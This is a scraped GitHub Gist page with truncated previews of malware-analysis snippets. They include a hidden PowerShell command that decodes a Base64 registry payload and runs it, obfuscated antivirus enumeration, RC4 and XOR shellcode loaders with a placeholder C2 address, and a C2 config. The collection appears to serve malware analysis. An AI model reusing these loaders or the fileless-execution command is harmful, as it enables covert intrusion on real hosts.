Skip to content

Instantly share code, notes, and snippets.

; shellcode found on Windows host. Payload was stored in the registry. Powershell
; was used to extract it from the registry and execute it:
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \
; hidden -c "$val = (gp HKLM:SOFTWARE\'਀਀').'਀਀'; \
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"
; The following references were used to help comment the shellcode
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/
# From "LNK file" malware
function Get-Soft {
param (
[Parameter(ValueFromPipeline=$true)]
[string[]]$ComputerName = $env:COMPUTERNAME,
[string]$NameRegex = ((("{13}{5}{7}{30}{16}{4}{18}{10}{8}{26}{11}{21}{24}{6}{23}{2}{3}{19}{20}{1}{14}{29}{0}{12}{28}{15}{22}{27}{25}{17}{9}"-f'do','ntiX','RgSec','ury','LACERTEXRgPROSERIES','RgFire','nde','foxXRgChr','XR','OS)','us','ire','XRgKasperXRgProtec','(OperaX','Rg',' of ','XRgTAXXRgOLTXRg','gP','XRgVir','X','RgA','wallXRg','Sale','rX','Defe','R','gF','X','tXRgPoint','Como','ome')).REpLace(([ChAR]88+[ChAR]82+[ChAR]103),[StRING][ChAR]124))
)
foreach ($comp in $ComputerName) {
$keys = '',((("{2}{3}{4}{1}{0}" -f 'Node','32','{0','}','Wow64')) -f [CHAr]92)
foreach ($key in $keys) {
function rsrzis {
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Security");
$Null = [Reflection.Assembly]::LoadWithPartialName("System.Core");
$ErrorActionPreference = "SilentlyContinue";
function wlc2 {
param([Byte[]]$mfvoiqhn_12tkvf,[Byte[]]$gibqokxyxbupwcsrtuvm_41nhwrp)
[Byte[]]$eplkztikdybroisgypg9qdbjfhmi = New-Object Byte[] $mfvoiqhn_12tkvf.Length;$mfvoiqhn_12tkvf.CopyTo($eplkztikdybroisgypg9qdbjfhmi, 0);[Byte[]]$s = New-Object Byte[] 256;[Byte[]]$k = New-Object Byte[] 256;
for ($i = 0; $i -lt 256; $i++){$s[$i] = [Byte]$i;$k[$i] = $gibqokxyxbupwcsrtuvm_41nhwrp[$i % $gibqokxyxbupwcsrtuvm_41nhwrp.Length];}
$j = 0;for ($i = 0; $i -lt 256; $i++){$j = ($j + $s[$i] + $k[$i]) % 256;$temp = $s[$i];$s[$i] = $s[$j];$s[$j] = $temp;};$i = $j = 0;
@jdferrell3
jdferrell3 / powershell_payload_decoded.ps1
Last active August 7, 2020 06:33
powershell payload decoded
# Formatting tweaked for readablity as an embedded gist, will not execute
# commented as well
Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {
Param ($var_module, $var_procedure)
$var_unsafe_native_methods = (
[AppDomain]::CurrentDomain.GetAssemblies() | Where-Object {
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False;
Function jpnm {
sal bifsynume Add-Type ;
if ($($PSVersionTable.PSVersion.Major) -ge 3){$e = 'CSharp'}else{$e = 'CSharpVersion3'}
bifsynume @"
using System;
using System.Runtime.InteropServices;
public class tqjn
{
# remove files that match a specified hash
$PATH = "c:\testing"
$HASH = "39DD73E4DAE46B506E7F9B41066F7F21E5D61DADD4D2B5806D31E364886C2D08"
$files = Get-ChildItem -Path $PATH -File
ForEach ($f in $files)
{
$fullpath = "$PATH\$f"
$hashInfo = Get-FileHash $fullpath -Algorithm SHA256
$IP = 'X.X.X.X'
$Port = 53
$VirtualAlloc = $null
$CreateThread = $null
$WaitForSingleObject = $null
$XORKEY = 0x50
function XorByteArr
{
Param
(
# Semi-deobfuscated PowerShell from malware analysis
function sdnfjshdklfhlj {
$ag = @{
srv = ("{3}{1}{0}{2}{4}{5}"-f '.','//YYY','Y','http:','Y.YYY','.YYY');
skkey = 'b[CgNFd8=sSQ{YsBcX6|PJ+A~w?#LEKH';
usag = (("{3}{9}{12}{14}{0}{18}{11}{7}{5}{16}{20}{23}{1}{8}{19}{6}{10}{22}{15}{2}{4}{21}{13}{17}"-f 'NT 6.1;','o); OPR/4','.0.3282.1','Mozilla/5','19; ','WebKit/5','44; Ch','ple','3.','.0 (Wi','rome','; x64) Ap','ndow','5','s ','64','37.36','37.36',' Win64','0.2441.11',' (KHTML, like ','Safari/','/','Geck'));
conType = ("{1}{0}{4}{2}{3}"-f 'pl','ap','ion/x','ml','icat')
reffer = ("{9}{2}{4}{7}{3}{8}{0}{10}{11}{5}{6}{12}{1}"-f 'oft','x','/www.u','i','pdate','/d','oc','.m','cros','https:/','.','com','s.asp');
encutf = [System.Text.Encoding]::UTF8;
#ifndef UNICODE
#define UNICODE
#endif
#include<windows.h>
int WINAPI wWinMain(HINSTANCE hinstance, HINSTANCE hprevinstance, PWSTR szCmdLine, int nCmdShow)
{
wchar_t path[256];
DWORD size = 256;
@jdferrell3
jdferrell3 / gist:6b2be0386caff742fbc1647714d7a21a
Created December 31, 2018 19:21
Setup Python virtualenv on Ubuntu
apt-get install python3-venv
python3 -m venv {env_dir}